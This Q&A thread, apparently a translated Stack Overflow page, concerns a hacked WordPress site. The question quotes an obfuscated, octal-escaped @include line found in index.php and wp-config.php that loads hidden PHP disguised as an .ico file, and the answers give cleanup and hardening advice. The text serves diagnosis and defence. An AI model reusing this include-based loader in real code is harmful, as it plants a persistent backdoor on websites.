WordPress网站被黑了吗?

时间:2019-02-10 08:00:12

标签: wordpress

我的wordpress网站似乎已被黑客入侵。以下代码段位于index.php,wp-config.php

<?php
/*6b9bb*/

@include "\057ho\155e/\151nt\145r7\0602/\160ub\154ic\137ht\155l/\167p-\151nc\154ud\145s/\152s/\164in\171mc\145/.\146b4\063d6\0700.\151co";

/*6b9bb*/

我已更改:

  1. WP管理员URL并输入强密码用户名
  2. 使用强密码更改了cpanel / FTP密码
  3. 实现了iTheme安全性
  4. 将Wordpress更新为最新的(主题和插件)

但是,代码再次重复。有什么好的解决方案?

p.s。我正在使用Siteground。

谢谢

3 个答案:

答案 0 :(得分:2)

是的,有人包含一个.ico文件(使用文本编辑器打开它,您会看到它是一些php代码,没有真正的ico文件)

/home/inter702/public_html/wp-includes/js/tinymce/.fb43d680.ico

尽管您更改了主机名和密码,但是黑客仍然可以进入,一旦它们进入,他们可以设置各种后门以保持访问,但是他们的任何.php文件都可以做到这一点。 目前,关闭他们使用的最初的前门是您的唯一职业。

遵循本文中的建议: https://codex.wordpress.org/FAQ_My_site_was_hacked 然后:https://codex.wordpress.org/Hardening_WordPress

以下是有关后门的一些链接: http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/ http://smackdown.blogsblogsblogs.com/2012/11/14/hacked-on-hostpapa-or-netregistry/ http://ottopress.com/2009/hacked-wordpress-backdoors/

来源:https://wordpress.org/support/topic/wordpress-hacked-strange-files-appears/

答案 1 :(得分:0)

我认为,一旦该网站遭到黑客入侵,抵制是徒劳的。没有任何扫描或工具可以帮助您。您将不得不用新的下载替换所有文件。大多是直接的:

  • 备份整个安装(以防万一)
    • 下载完整的wp-content / uploads文件夹
    • 制作屏幕截图或使用当前处于活动状态的插件保存页面
    • 删除所有文件
    • 获取新的wordpress设置并将其提取
    • 下载主题和子主题的新副本(重新创建以前的设置)
    • 将以前的wp-config.php复制到此全新安装中。但好好看一下。通常它也有一些病毒/后门。通常易于查看和删除。现在您已经与数据库连接
    • 检查保存的上载文件夹中是否存在不应存在的文件,例如php文件。然后将其上传到新文件夹
    • 重新安装所有插件,重新下载

答案 2 :(得分:0)

我也遇到了这个问题,我一步一步做了以下步骤:

  • 手动清理注入的代码
  • 更改所有密码
  • 隐藏 WP 管理仪表板 URL
  • 限制登录尝试
  • 安装安全插件(Sucuri、Wordfence 安全)
  • 与Sucuri计划签约 好的是安装 Wordfence 安全插件,运行扫描,然后您将检测到所有包含注入代码的文件,您可以手动清理注入的代码。 你也可以访问这个链接 https://naderzad.info/web-development/wordpress-code-injection/